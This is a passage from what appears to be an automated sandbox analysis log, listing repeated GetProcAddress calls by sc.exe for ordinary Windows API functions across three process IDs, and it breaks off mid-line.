\"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002356)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 